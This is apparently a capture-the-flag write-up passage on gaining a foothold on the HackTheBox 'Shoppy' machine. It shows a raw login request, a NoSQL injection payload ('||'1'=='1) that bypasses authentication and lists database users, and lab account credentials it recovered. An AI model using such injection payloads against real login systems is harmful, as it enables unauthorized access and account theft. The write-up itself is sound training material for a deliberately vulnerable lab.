Foothold

Back to the login page. I noticed that every time I would insert a single ' into the username field the request would just die. This led me down an SQL injection rabbit hole that led me nowhere until I found something about it possibly being a NoSQL injection vulnerability

Definitely learnt something new that added an entirely new page to my webapp checklist 😄

LogoNoSQL injection | Web Security AcademyWebSecAcademy
LogoLab: Exploiting NoSQL operator injection to bypass authentication | Web Security AcademyWebSecAcademy

Change Content-Typeand parameter format to json

POST /login HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 42
Origin: http://shoppy.htb
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://shoppy.htb/login
Upgrade-Insecure-Requests: 1
Priority: u=0, i

{"username":"admin", "password":"admin"}

We get the same response when we send the request but if we miss a parameter we error out

Note this for later

/home/jaeger/ShoppyApp/

Injecting query operators didnt end up working so I turned to Ippsec and he displayed the following payload to append

'||'1'=='1

We get a valid login

Using the same payload we can find all users within the database

'||'1'=='1
josh:remembermethisway

Log into the Mattermost application

And dont be rude

jaeger:Sh0ppyBest@pp!
Previous9093NextPriv Esc

Last updated

Was this helpful?